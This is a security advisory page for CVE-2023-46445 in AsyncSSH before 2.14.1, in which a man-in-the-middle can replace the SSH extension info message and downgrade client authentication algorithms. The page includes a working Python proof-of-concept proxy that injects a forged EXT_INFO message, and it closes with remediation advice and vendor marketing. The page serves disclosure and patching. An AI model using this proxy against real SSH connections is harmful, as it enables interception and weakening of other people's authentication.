Summary
AsyncSSH Rogue Extension Negotiation
An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack.
Details
The rogue extension negotiation attack targets an AsyncSSH client connecting to any SSH server sending an extension info message. The attack exploits an implementation flaw in the AsyncSSH implementation to inject an extension info message chosen by the attacker and delete the original extension info message, effectively replacing it.
A correct SSH implementation should not process an unauthenticated extension info message. However, the injected message is accepted due to flaws in AsyncSSH. AsyncSSH supports the server-sig-algs and global-requests-ok extensions. Hence, the attacker can downgrade the algorithm used for client authentication by meddling with the value of server-sig-algs (e.g. use of SHA-1 instead of SHA-2).
PoC
AsyncSSH Client 2.14.0 (simple_client.py example) connecting to AsyncSSH Server 2.14.0 (simple_server.py example) #!/usr/bin/python3
import socket
from threading import Thread
from binascii import unhexlify
#####################################################################################
## Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ##
## ##
## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ##
## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ##
## ##
## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##
#####################################################################################
# IP and port for the TCP proxy to bind to
PROXY_IP = '127.0.0.1'
PROXY_PORT = 2222
# IP and port of the server
SERVER_IP = '127.0.0.1'
SERVER_PORT = 22
# Length of the individual messages
NEW_KEYS_LENGTH = 16
SERVER_EXT_INFO_LENGTH = 676
newkeys_payload = b'\x00\x00\x00\x0c\x0a\x15'
def contains_newkeys(data):
return newkeys_payload in data
# Empty EXT_INFO here to keep things simple, but may also contain actual extensions like server-sig-algs
rogue_ext_info = unhexlify('0000000C060700000000000000000000')
def insert_rogue_ext_info(data):
newkeys_index = data.index(newkeys_payload)
# Insert rogue extension info and remove SSH_MSG_EXT_INFO
return data[:newkeys_index] + rogue_ext_info + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:]
def forward_client_to_server(client_socket, server_socket):
try:
while True:
client_data = client_socket.recv(4096)
if len(client_data) == 0:
break
server_socket.send(client_data)
except ConnectionResetError:
print("[!] Client connection has been reset. Continue closing sockets.")
print("[!] forward_client_to_server thread ran out of data, closing sockets!")
client_socket.close()
server_socket.close()
def forward_server_to_client(client_socket, server_socket):
try:
while True:
server_data = server_socket.recv(4096)
if contains_newkeys(server_data):
print("[+] SSH_MSG_NEWKEYS sent by server identified!")
if len(server_data) < NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:
print("[+] server_data does not contain all messages sent by the server yet. Receiving additional bytes until we have 692 bytes buffered!")
while len(server_data) < NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:
server_data += server_socket.recv(4096)
print(f"[d] Original server_data before modification: {server_data.hex()}")
server_data = insert_rogue_ext_info(server_data)
print(f"[d] Modified server_data with rogue extension info: {server_data.hex()}")
if len(server_data) == 0:
break
client_socket.send(server_data)
except ConnectionResetError:
print("[!] Target connection has been reset. Continue closing sockets.")
print("[!] forward_server_to_client thread ran out of data, closing sockets!")
client_socket.close()
server_socket.close()
if __name__ == '__main__':
print("--- Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ---")
mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mitm_socket.bind((PROXY_IP, PROXY_PORT))
mitm_socket.listen(5)
print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...")
try:
while True:
client_socket, client_addr = mitm_socket.accept()
print(f"[+] Accepted connection from: {client_addr}")
print(f"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.")
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.connect((SERVER_IP, SERVER_PORT))
print("[+] Spawning new forwarding threads to handle client connection.")
Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()
Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()
except KeyboardInterrupt:
client_socket.close()
server_socket.close()
mitm_socket.close()
Impact
Algorithm downgrade during user authentication.
CVE-2023-46445 has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.14.1); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2023-46445? CVE-2023-46445 is a medium-severity security vulnerability in asyncssh (pip), affecting versions < 2.14.1. It is fixed in 2.14.1.
- How severe is CVE-2023-46445? CVE-2023-46445 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of asyncssh are affected by CVE-2023-46445? asyncssh (pip) versions < 2.14.1 is affected.
- Is there a fix for CVE-2023-46445? Yes. CVE-2023-46445 is fixed in 2.14.1. Upgrade to this version or later.
- Is CVE-2023-46445 exploitable, and should I be worried? Whether CVE-2023-46445 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2023-46445 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2023-46445? Upgrade
asyncsshto 2.14.1 or later.